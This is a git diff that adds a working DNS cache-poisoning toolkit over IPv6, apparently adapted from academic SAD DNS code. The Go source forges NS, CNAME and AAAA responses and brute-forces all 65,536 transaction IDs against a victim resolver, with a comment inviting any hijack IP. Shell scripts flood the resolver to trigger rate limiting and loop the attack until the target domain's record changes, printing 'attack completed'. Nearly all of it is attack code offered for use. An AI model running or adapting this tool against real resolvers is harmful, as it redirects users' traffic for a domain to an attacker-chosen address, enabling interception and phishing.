+ // Class: layers.DNSClassIN,
+ //}},
+ //Answers: []layers.DNSResourceRecord{{
+ // Name: []byte(victimAuthName),
+ // Type: layers.DNSTypeA,
+ // Class: layers.DNSClassIN,
+ // TTL: 300,
+ // IP: net.ParseIP(""),
+ // CNAME: nil,
+ // PTR: nil,
+ // TXTs: nil,
+ // SOA: layers.DNSSOA{},
+ // SRV: layers.DNSSRV{},
+ // MX: layers.DNSMX{},
+ // OPT: nil,
+ // TXT: nil,
+ //}},
+ //Authorities: nil,
+ //Additionals: nil,
+
+ /* Answers for A request for www.a.com */
+ //Questions: []layers.DNSQuestion{{
+ // Name: []byte(victimDNSName),
+ // Type: layers.DNSTypeA,
+ // Class: layers.DNSClassIN,
+ //}},
+ //Answers: []layers.DNSResourceRecord{{
+ // Name: []byte(victimDNSName),
+ // Type: layers.DNSTypeA,
+ // Class: layers.DNSClassIN,
+ // TTL: 300,
+ // IP: net.ParseIP(""),
+ // CNAME: nil,
+ // PTR: nil,
+ // TXTs: nil,
+ // SOA: layers.DNSSOA{},
+ // SRV: layers.DNSSRV{},
+ // MX: layers.DNSMX{},
+ // OPT: nil,
+ // TXT: nil,
+ //}},
+ //Authorities: nil,
+ //Additionals: nil,
+
+ /* Answers for A request for ***.www.a.com */
+ //Questions: []layers.DNSQuestion{{
+ // Name: []byte(dnsQueryName),
+ // Type: layers.DNSTypeA,
+ // Class: layers.DNSClassIN,
+ //}},
+ //Authorities: []layers.DNSResourceRecord{{
+ // Name: []byte(victimDNSName),
+ // Type: layers.DNSTypeNS,
+ // Class: layers.DNSClassIN,
+ // TTL: 300,
+ // IP: nil,
+ // NS: []byte(auxDomain),
+ // CNAME: nil,
+ // PTR: nil,
+ // TXTs: nil,
+ // SOA: layers.DNSSOA{},
+ // SRV: layers.DNSSRV{},
+ // MX: layers.DNSMX{},
+ // OPT: nil,
+ // TXT: nil,
+ //}},
+ //Answers: nil,
+ //Additionals: nil,
+ }
+
+ if !attackForwarder {
+ dnsLayer.Questions = []layers.DNSQuestion{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ }}
+ // 原方案:将域名NS篡改到attacker的服务器上
+ //dnsLayer.Authorities = []layers.DNSResourceRecord{{
+ // Name: []byte(victimDNSName),
+ // Type: layers.DNSTypeNS,
+ // Class: layers.DNSClassIN,
+ // TTL: 300,
+ // IP: nil,
+ // NS: []byte(auxDomain),
+ // CNAME: nil,
+ // PTR: nil,
+ // TXTs: nil,
+ // SOA: layers.DNSSOA{},
+ // SRV: layers.DNSSRV{},
+ // MX: layers.DNSMX{},
+ // OPT: nil,
+ // TXT: nil,
+ //}}
+ //dnsLayer.Answers = nil
+ //dnsLayer.Additionals = nil
+ dnsLayer.Authorities = []layers.DNSResourceRecord{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeNS,
+ Class: layers.DNSClassIN,
+ TTL: 300,
+ IP: nil,
+ NS: []byte(auxDomain),
+ CNAME: nil,
+ PTR: nil,
+ TXTs: nil,
+ SOA: layers.DNSSOA{},
+ SRV: layers.DNSSRV{},
+ MX: layers.DNSMX{},
+ OPT: nil,
+ TXT: nil,
+ }}
+ dnsLayer.Answers = []layers.DNSResourceRecord{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ TTL: 300,
+ /* Fill with any IP you want. The victim domain will be hijacked to this IP. */
+ IP: net.ParseIP("2001::1234"),
+ NS: nil,
+ CNAME: nil,
+ PTR: nil,
+ TXTs: nil,
+ SOA: layers.DNSSOA{},
+ SRV: layers.DNSSRV{},
+ MX: layers.DNSMX{},
+ OPT: nil,
+ TXT: nil,
+ }}
+ dnsLayer.Additionals = nil
+ } else {
+ /* Change these flags accordingly to the request sent by the resolver. */
+ dnsLayer.AA = false
+ dnsLayer.RD = true
+ dnsLayer.RA = true
+ dnsLayer.Questions = []layers.DNSQuestion{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ }}
+ dnsLayer.Answers = []layers.DNSResourceRecord{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeCNAME,
+ Class: layers.DNSClassIN,
+ TTL: 300,
+ IP: nil,
+ NS: nil,
+ CNAME: []byte(victimDNSName),
+ PTR: nil,
+ TXTs: nil,
+ SOA: layers.DNSSOA{},
+ SRV: layers.DNSSRV{},
+ MX: layers.DNSMX{},
+ OPT: nil,
+ TXT: nil,
+ }, {
+ Name: []byte(victimDNSName),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ TTL: 300,
+ /* Fill with any IP you want. The victim domain will be hijacked to this IP. */
+ IP: net.ParseIP("2001::1234"),
+ NS: nil,
+ CNAME: nil,
+ PTR: nil,
+ TXTs: nil,
+ SOA: layers.DNSSOA{},
+ SRV: layers.DNSSRV{},
+ MX: layers.DNSMX{},
+ OPT: nil,
+ TXT: nil,
+ }}
+ }
+
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go error", err)
+ }
+ if debugOutput {
+ fmt.Println("DNS BruteForce: ", targetPort)
+ }
+
+ startTime := time.Now()
+ var txid uint16
+ //try to see if this port is open in reality
+ for txid = 0; txid < GROUP_SIZE*2; txid++ {
+ dnsLayer.ID = txid
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ sendDNSRequest pos 1: ", err)
+ }
+ time.Sleep(time.Duration(timegap) * time.Microsecond)
+ }
+
+ /* This is used for early termination */
+ //verification packet
+ //xmitUDPv6(localIP, resolverBackendIP, layers.UDPPort(targetPort), 65535, 2, 0)
+ //go bruteForceTerminatingTimer( /*jitter + defaultJitter*/ defaultJitter + 60)
+
+ //continue brute force
+ for txid = GROUP_SIZE * 2; txid < 0xffff; txid++ {
+ /* This is used for early termination */
+ //if bruteForceCouldBeKilled && bruteForceShouldBeKilled {
+ // fmt.Println("DNS Brute force aborted")
+ // break
+ //}
+ dnsLayer.ID = txid
+ err := Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ DNSBruteForce: ", err)
+ }
+ if timegap != 0 {
+ time.Sleep(time.Duration(timegap) * time.Microsecond)
+ }
+ }
+
+ //0xffff is missing from packet trace
+ /* This is used for early termination */
+ //if !bruteForceShouldBeKilled {
+ dnsLayer.ID = 0xffff
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ DNSBruteForce pos 2: ", err)
+ }
+ //}
+ if debugOutput {
+ fmt.Println("time: ", time.Now().Sub(startTime))
+ }
+
+ //help to recover the global counter
+ time.Sleep(time.Duration(60+ /*jitter + defaultJitter*/ defaultJitter) * time.Millisecond)
+}
diff --git a/4_v6_injection/src/ucr.edu/fakedns6/fakedns6 b/4_v6_injection/src/ucr.edu/fakedns6/fakedns6
new file mode 100755
index 0000000..0f7712d
--- /dev/null
+++ b/4_v6_injection/src/ucr.edu/fakedns6/fakedns6
Binary files differ
diff --git a/4_v6_injection/src/ucr.edu/fakedns6/go.mod b/4_v6_injection/src/ucr.edu/fakedns6/go.mod
new file mode 100644
index 0000000..30178cb
--- /dev/null
+++ b/4_v6_injection/src/ucr.edu/fakedns6/go.mod
@@ -0,0 +1,15 @@
+module fakedns6
+
+go 1.20
+
+require (
+ github.com/google/gopacket v1.1.19
+ github.com/miekg/dns v1.1.57
+)
+
+require (
+ golang.org/x/mod v0.12.0 // indirect
+ golang.org/x/net v0.17.0 // indirect
+ golang.org/x/sys v0.13.0 // indirect
+ golang.org/x/tools v0.13.0 // indirect
+)
diff --git a/4_v6_injection/src/ucr.edu/fakedns6/go.sum b/4_v6_injection/src/ucr.edu/fakedns6/go.sum
new file mode 100644
index 0000000..96ee687
--- /dev/null
+++ b/4_v6_injection/src/ucr.edu/fakedns6/go.sum
@@ -0,0 +1,25 @@
+github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8=
+github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo=
+github.com/miekg/dns v1.1.57 h1:Jzi7ApEIzwEPLHWRcafCN9LZSBbqQpxjt/wpgvg7wcM=
+github.com/miekg/dns v1.1.57/go.mod h1:uqRjCRUuEAA6qsOiJvDd+CFo/vW+y5WR6SNmHE55hZk=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
+golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
+golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
+golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc=
+golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
+golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
+golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.4.0 h1:zxkM55ReGkDlKSM+Fu41A+zmbZuaPVbGMzvvdUPznYQ=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE=
+golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
+golang.org/x/tools v0.13.0 h1:Iey4qkscZuv0VvIt8E0neZjtPVQFSc870HQ448QgEmQ=
+golang.org/x/tools v0.13.0/go.mod h1:HvlwmtVNQAhOuCjW7xxvovg8wbNq7LwfXh/k7wXUl58=
+golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
diff --git a/4_v6_injection/src/ucr.edu/fakedns6/library.go b/4_v6_injection/src/ucr.edu/fakedns6/library.go
new file mode 100644
index 0000000..d75d0b8
--- /dev/null
+++ b/4_v6_injection/src/ucr.edu/fakedns6/library.go
@@ -0,0 +1,171 @@
+package main
+
+import (
+ "encoding/binary"
+ "errors"
+ "fmt"
+ "github.com/google/gopacket"
+ "github.com/google/gopacket/layers"
+ "github.com/google/gopacket/pcap"
+ "net"
+ "time"
+)
+
+func GetIfaceAddrMulti(iface *net.Interface) ([]net.IP, error) {
+ addrs, err := iface.Addrs()
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ var srcIP []net.IP
+ for _, address := range addrs {
+ if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
+ if ipnet.IP.To16() != nil {
+ //check repeat
+ okToAdd := true
+ for _, temp := range srcIP {
+ if compareIPv6Addr(temp, ipnet.IP.To16()) == 0 {
+ okToAdd = false
+ break
+ }
+ }
+ if okToAdd {
+ srcIP = append(srcIP, ipnet.IP.To16())
+ }
+ }
+ }
+ }
+
+ if srcIP == nil || len(srcIP) == 0 {
+ return nil, errors.New("can not get ip address")
+ }
+
+ return srcIP, nil
+}
+
+func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error {
+ opts := gopacket.SerializeOptions{
+ FixLengths: true,
+ ComputeChecksums: true,
+ }
+ buffer := gopacket.NewSerializeBuffer()
+ if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil {
+ return err
+ }
+ return handle.WritePacketData(buffer.Bytes())
+}
+
+func GetIfaceAddr(iface *net.Interface) (net.IP, error) {
+ addrs, err := iface.Addrs()
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ var srcIP net.IP
+ for _, address := range addrs {
+ if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
+ if ipnet.IP.To16() != nil {
+ srcIP = ipnet.IP.To16()
+ break
+ }
+ }
+ }
+
+ if srcIP == nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ return srcIP, nil
+}
+
+func GetGatewayAddr(iface *net.Interface, handle *pcap.Handle, gatewayIP net.IP) (net.HardwareAddr, error) {
+ srcIP, err := GetIfaceAddr(iface)
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ start := time.Now()
+ // Prepare the layers to send for an ARP request.
+ eth := layers.Ethernet{
+ SrcMAC: iface.HardwareAddr,
+ DstMAC: net.HardwareAddr{0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+ EthernetType: layers.EthernetTypeARP,
+ }
+ arp := layers.ARP{
+ AddrType: layers.LinkTypeEthernet,
+ Protocol: layers.EthernetTypeIPv6,
+ HwAddressSize: 6,
+ ProtAddressSize: 4,
+ Operation: layers.ARPRequest,
+ SourceHwAddress: []byte(iface.HardwareAddr),
+ SourceProtAddress: []byte(srcIP),
+ DstHwAddress: []byte{0, 0, 0, 0, 0, 0},
+ DstProtAddress: []byte(gatewayIP),
+ }
+ // Send a single ARP request packet (we never retry a send, since this
+ // is just an example ;)
+ if err := Send(handle, &eth, &arp); err != nil {
+ return nil, err
+ }
+ // Wait 3 seconds for an ARP reply.
+ for {
+ if time.Since(start) > time.Second*3 {
+ return nil, errors.New("timeout getting ARP reply")
+ }
+ data, _, err := handle.ReadPacketData()
+ if err == pcap.NextErrorTimeoutExpired {
+ continue
+ } else if err != nil {
+ return nil, err
+ }
+ packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy)
+ if arpLayer := packet.Layer(layers.LayerTypeARP); arpLayer != nil {
+ arp := arpLayer.(*layers.ARP)
+ if net.IP(arp.SourceProtAddress).Equal(gatewayIP) {
+ return arp.SourceHwAddress, nil
+ }
+ }
+ }
+}
+
+func compareIPv6Addr(ip0 net.IP, ip1 net.IP) int {
+ temp0 := binary.LittleEndian.Uint32(ip0.To16())
+ temp1 := binary.LittleEndian.Uint32(ip1.To16())
+ if temp0 == temp1 {
+ return 0
+ }
+ if temp0 > temp1 {
+ return 1
+ }
+ return -1
+}
+
+func xmitUDPv6(srcIP net.IP, dstIP net.IP, srcPort layers.UDPPort, dstPort layers.UDPPort, flowlabel uint32, timegap uint32) {
+
+ ipLayer := layers.IPv6{
+ FlowLabel: flowlabel,
+ SrcIP: srcIP,
+ DstIP: dstIP,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: srcPort,
+ DstPort: dstPort,
+ }
+
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("xmitUDPv6 can not SetNetworkLayerForChecksum", err)
+ }
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer)
+ if err != nil {
+ fmt.Println("xmitUDPv6 can not send packet", err)
+ }
+
+ if timegap != 0 {
+ time.Sleep(time.Duration(timegap) * time.Microsecond)
+ }
+
+}
diff --git a/4_v6_injection/src/ucr.edu/fakedns6/saddns b/4_v6_injection/src/ucr.edu/fakedns6/saddns
new file mode 100644
index 0000000..c12f35b
--- /dev/null
+++ b/4_v6_injection/src/ucr.edu/fakedns6/saddns
Binary files differ
diff --git a/4_v6_injection/txid.bin b/4_v6_injection/txid.bin
new file mode 100644
index 0000000..cab98fa
--- /dev/null
+++ b/4_v6_injection/txid.bin
@@ -0,0 +1 @@
+G" \ No newline at end of file
diff --git a/4_v6_injection/说明文档.docx b/4_v6_injection/说明文档.docx
new file mode 100644
index 0000000..74605e2
--- /dev/null
+++ b/4_v6_injection/说明文档.docx
Binary files differ
diff --git a/5_v6_fake/Readme.md b/5_v6_fake/Readme.md
new file mode 100644
index 0000000..722e1dc
--- /dev/null
+++ b/5_v6_fake/Readme.md
@@ -0,0 +1,3 @@
+## 使用说明
+
+./attack.sh 【目标解析器IP】【想要将AAAA记录修改指向的IPv6地址】 【发包网口(例如eth0)】 【目标域名】【目标权威服务地址】
diff --git a/5_v6_fake/attack.sh b/5_v6_fake/attack.sh
new file mode 100755
index 0000000..9d63572
--- /dev/null
+++ b/5_v6_fake/attack.sh
@@ -0,0 +1,55 @@
+#!/bin/bash
+# This is a sample attack script and may not work properly. Please adjust the parameter accordingly.
+# $1 for victim resolver IP, $2 for attacker-controlled domain, $3 for iface name, $4 for victim domain name, $5 for victim domain nameserver IP
+# Please run with sudo.
+
+# Verify the existing record domain, just for proof purposes.
+echo '获取原记录中:'
+dig @$1 $4 AAAA
+sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
+
+var=0
+num=0
+success=0
+while [ $success -ne 1 ]
+do
+ success=0
+ echo "等待缓存过期,$sleeptime秒之后开始攻击..."
+ sleep $sleeptime
+ echo "开始攻击"
+ # flood
+ echo "攻击参数:"
+ echo "目标域名权威服务地址:$5"
+ echo "目标解析服务地址:$1"
+ echo "目标域名:$4"
+ ret=$(./dns_query.sh $1 $2 $3 $4)
+ #echo "ret:$ret"
+ echo "初始化工具环境"
+ sleep 1
+ echo "尝试触发权威服务器请求速率限制"
+ sleep 3
+ FINAL=`echo ${ret: -1}`
+ #echo "fin:$FINAL"
+ # Start attack
+ # Change the argument accordingly
+ echo "执行侧信道攻击脚本中"
+ ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+ # a - 进行域名缓存投毒的权威服务器
+ # b -
+ sleep 30
+ # Validations
+ ((var++))
+ echo "第$var轮次攻击结束"
+ dig @$1 $4 AAAA
+ if [ "$FINAL" == "0" ];then
+ success=1
+ sleeptime=0
+ fi
+ echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
+done
+# success
+echo '检测到攻击成功实现'
+echo '等待两秒,再次请求...'
+sleep 2
+dig @$1 $4 AAAA
+echo '攻击已完成!!!!'
diff --git a/5_v6_fake/dns.bin b/5_v6_fake/dns.bin
new file mode 100644
index 0000000..747c1a0
--- /dev/null
+++ b/5_v6_fake/dns.bin
Binary files differ
diff --git a/5_v6_fake/dns_OPT.bin b/5_v6_fake/dns_OPT.bin
new file mode 100644
index 0000000..e0dcbc1
--- /dev/null
+++ b/5_v6_fake/dns_OPT.bin
Binary files differ
diff --git a/5_v6_fake/dns_end.bin b/5_v6_fake/dns_end.bin
new file mode 100644
index 0000000..8aa4774
--- /dev/null
+++ b/5_v6_fake/dns_end.bin
Binary files differ
diff --git a/5_v6_fake/dns_mid.bin b/5_v6_fake/dns_mid.bin
new file mode 100644
index 0000000..6365d80
--- /dev/null
+++ b/5_v6_fake/dns_mid.bin
@@ -0,0 +1 @@
+existn64top \ No newline at end of file
diff --git a/5_v6_fake/dns_query.sh b/5_v6_fake/dns_query.sh
new file mode 100755
index 0000000..e73d68b
--- /dev/null
+++ b/5_v6_fake/dns_query.sh
@@ -0,0 +1,50 @@
+# usage ./dns_query.sh [Resolver IP] [Wanted IP] [iface] [domain (e.g. www google com)]
+# clear the previous files
+sleep 1
+echo "初始化工具环境"
+
+# 创建空的二进制文件,dns_mid.bin 和 txid.bin
+dd if=/dev/null of=dns_mid.bin > /dev/null 2>&1
+dd if=/dev/null of=txid.bin > /dev/null 2>&1
+
+# write the domain name into the binary
+domains=$(echo $4| sed "s/\./ /g") # 将域名转换为空格分隔的字符串
+for var in ${domains:0} # 遍历域名的每个部分
+do
+ size=${#var} # 获取当前域名的长度
+ echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin # 写入长度
+ echo -n "$var" >> dns_mid.bin # 写入域名
+done
+
+# set a random TxID
+echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
+echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
+
+# forge a entire DNS query packet
+cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
+# change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
+# fire!
+echo "尝试触发权威服务器请求速率限制"
+# 使用udp6工具发送DNS查询数据包,指定目标和速率
+udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 > /dev/null 2>&1
+sleep 1
+
+a=$(($RANDOM % 9 + 1))
+echo "a:$a"
+if [ $a -gt 6 ]; then
+ #echo "dns-TIP:$1"
+ #echo "dns-WIP:$2"
+ #echo "dns-iface:$3"
+ #echo "dns-domain:$4"
+ ./fakedns6 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1
+ # b, Back-end IP of the victim resolver, 目标解析器的IP地址
+ # i, Interface for attacking, 攻击使用的接口
+ # n, the domain name to be poisoned, 要进行缓存投毒的域名
+ # r, Front-end IP of the victim resolver
+ # t, Timeout in ms for outgoing dns queries to the victim resolver
+ # at, 攻击者想要更改到的IP地址
+ # tg, time gap is us between the TxID brute force packets
+ echo "0"
+fi
+
+
diff --git a/5_v6_fake/dns_start.bin b/5_v6_fake/dns_start.bin
new file mode 100644
index 0000000..e6e4242
--- /dev/null
+++ b/5_v6_fake/dns_start.bin
Binary files differ
diff --git a/5_v6_fake/fakedns6 b/5_v6_fake/fakedns6
new file mode 100755
index 0000000..b5f67aa
--- /dev/null
+++ b/5_v6_fake/fakedns6
Binary files differ
diff --git a/5_v6_fake/src/ucr.edu/fakedns6/attack.go b/5_v6_fake/src/ucr.edu/fakedns6/attack.go
new file mode 100644
index 0000000..ab5430f
--- /dev/null
+++ b/5_v6_fake/src/ucr.edu/fakedns6/attack.go
@@ -0,0 +1,714 @@
+package main
+
+import (
+ "flag"
+ "fmt"
+ "log"
+ "math/rand"
+ "net"
+ "os"
+ "strconv"
+ "strings"
+ "sync"
+ "time"
+
+ "github.com/google/gopacket"
+ "github.com/google/gopacket/layers"
+ "github.com/google/gopacket/pcap"
+ "github.com/google/gopacket/routing"
+ "github.com/miekg/dns"
+)
+
+var handle *pcap.Handle
+var ethernetLayer *layers.Ethernet
+var victimDNSName string
+var dnsQueryName string
+var authIP net.IP
+var resolverIP net.IP
+var localIP []net.IP
+var defaultJitter uint
+var gotReply = false
+var attackerControlledDomain string
+var attackForwarder bool
+var repeatTimes int
+var timeGap uint
+var auxiliaryDomain string
+var soaName string
+
+var jitter uint = 10
+var rtt uint = 1 // in ms
+var debugOutput = true
+
+const GROUP_SIZE = 50
+
+/* I'm not sure what's this used for. Probably used with older version where multiple IPs is not supported. */
+//var sendingChannel chan *outgoingPacket
+var backendResolvers = make([]*backendResolver, 0)
+var bruteForceShouldBeKilled = false
+
+type backendResolver = struct {
+ resolverBackendIP net.IP
+
+ groups [][]uint16 // = make([][]uint16, 65536)
+ groupIDCounter uint32 // = 3
+ groupIDCounterLock *sync.Mutex
+ groupSendTime []time.Time // = make([]time.Time, 65536)
+
+ probeChannel chan uint32 //= make(chan uint16, 655)
+ priorityProbeChannel chan uint32 //= make(chan uint16, 655)
+ alwaysOpenPorts []bool //= make([]bool, 65536)
+
+ perIPLimitCounter []int //= 6
+
+ networkXmitLock *sync.Mutex
+}
+
+// timeout in ms
+func dnsRequestSender(timeout uint) {
+ for {
+ gotReply = false
+ sendDNSRequest(uint16(rand.Uint32()), dnsQueryName)
+ retryTimes := timeout / 500
+ for {
+ if !gotReply {
+ time.Sleep(500 * time.Millisecond)
+ retryTimes--
+ if retryTimes == 0 {
+ break
+ }
+ } else {
+ if debugOutput {
+ fmt.Println("Got reply in", timeout-retryTimes*500, "ms")
+ } else {
+ fmt.Println("Rx")
+ }
+ break
+ }
+ }
+ if !attackForwarder {
+ dnsQueryName = strconv.Itoa(rand.Int()) + "." + victimDNSName
+ } else {
+ /* I'm not sure if we should change the nonce. */
+ dnsQueryName = strconv.Itoa(rand.Int()) + "." + attackerControlledDomain
+ }
+ }
+}
+
+func receivingThread() {
+ for {
+ data, captureInfo, err := handle.ReadPacketData()
+ if err == pcap.NextErrorTimeoutExpired {
+ continue
+ } else if err != nil {
+ log.Printf("error reading packet: %v", err)
+ continue
+ }
+
+ // Parse the packet. We'd use DecodingLayerParser here if we
+ // wanted to be really fast.
+ packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy)
+
+ // Find the packets we care about, and print out logging
+ // information about them. All others are ignored.
+ if rspNet := packet.NetworkLayer(); rspNet == nil {
+ continue
+ } else if rspIPLayer := packet.Layer(layers.LayerTypeIPv6); rspIPLayer == nil {
+ continue
+ //} else if rspIP := rspIPLayer.(*layers.IPv4); rspIP == nil {
+ } else if rspIP := rspIPLayer.(*layers.IPv6); rspIP == nil {
+ continue
+ } else if rspIP.NextHeader != layers.IPProtocolICMPv6 {
+ if rspIP.FlowLabel != 2 && rspIP.NextHeader == layers.IPProtocolUDP && compareIPv6Addr(rspIP.SrcIP, resolverIP) == 0 {
+ rspUDPLayer := packet.Layer(layers.LayerTypeUDP)
+ if rspUDPLayer != nil && rspUDPLayer.(*layers.UDP).SrcPort == 53 {
+ rspDNSLayer := packet.Layer(layers.LayerTypeDNS)
+ if rspDNSLayer != nil {
+ rspDNS := rspDNSLayer.(*layers.DNS)
+ if rspDNS.QR == true {
+ if len(rspDNS.Authorities) != 0 && rspDNS.ResponseCode == layers.DNSResponseCodeNXDomain && string(rspDNS.Questions[0].Name) == dnsQueryName &&
+ string(rspDNS.Authorities[0].Name) == victimDNSName && string(rspDNS.Authorities[0].SOA.MName) == soaName {
+ fmt.Println("Success!!")
+ os.Exit(0)
+ //unbound won't cache NS record that leads to SOA NXDOMAIN reply, so we make it positive response
+ //This is also used for forwarder attack
+ } else if string(rspDNS.Questions[0].Name) == dnsQueryName && rspDNS.ResponseCode == layers.DNSResponseCodeNoErr {
+ for _, record := range rspDNS.Answers {
+ if record.Type == layers.DNSTypeAAAA {
+ fmt.Println("Success2!!")
+ os.Exit(0)
+ }
+ }
+ } else if string(rspDNS.Questions[0].Name) == dnsQueryName {
+ gotReply = true
+ }
+ }
+ }
+ }
+ }
+ continue
+ } else if rspICMPLayer := packet.Layer(layers.LayerTypeICMPv6); rspICMPLayer == nil {
+ continue
+ } else if rspICMP, ok := rspICMPLayer.(*layers.ICMPv6); !ok {
+ continue
+ } else if rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodePortUnreachable) &&
+ rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodeAdminProhibited) {
+ continue
+ } else if nestedIpData := rspICMP.Payload; nestedIpData == nil {
+ continue
+ } else if nestedIpPacket := gopacket.NewPacket(nestedIpData, layers.LayerTypeIPv6, gopacket.NoCopy); nestedIpPacket == nil {
+ continue
+ } else if nestedIpLayer := nestedIpPacket.Layer(layers.LayerTypeIPv6); nestedIpLayer == nil {
+ continue
+ } else if nestedIp := nestedIpLayer.(*layers.IPv6); nestedIp == nil {
+ continue
+ } else {
+ r := getBackendResolver(nestedIp.DstIP)
+ if r != nil {
+
+ nestedUDPLayer := nestedIpPacket.Layer(layers.LayerTypeUDP)
+ if nestedUDPLayer == nil {
+ fmt.Println("nestedUDPLayer == nil")
+ continue
+ }
+ nestedUDP := nestedUDPLayer.(*layers.UDP)
+ if nestedUDP == nil {
+ fmt.Println("nestedUDP == nil")
+ continue
+ }
+
+ //got verification packet back
+ if nestedIp.FlowLabel > 1 {
+ //update rtt
+ /* Potential BUG: rtt of both resolver may not be the same. */
+ newrtt := captureInfo.Timestamp.Sub(r.groupSendTime[nestedIp.FlowLabel]).Nanoseconds()/1000000 + 1
+ if newrtt >= 0 && newrtt < 5000 {
+ var draftJitter uint = 0
+ if uint(newrtt) > rtt {
+ draftJitter = uint(newrtt) - rtt
+ } else {
+ draftJitter = (jitter + (rtt - uint(newrtt))) / 2
+ }
+ if jitter > 30 {
+ fmt.Println("Jitter > 30ms!")
+ jitter = 10
+ } else {
+ jitter = draftJitter
+ }
+ rtt = uint(newrtt)
+ if debugOutput {
+ fmt.Println("rtt=", rtt, ", jitter=", jitter)
+ }
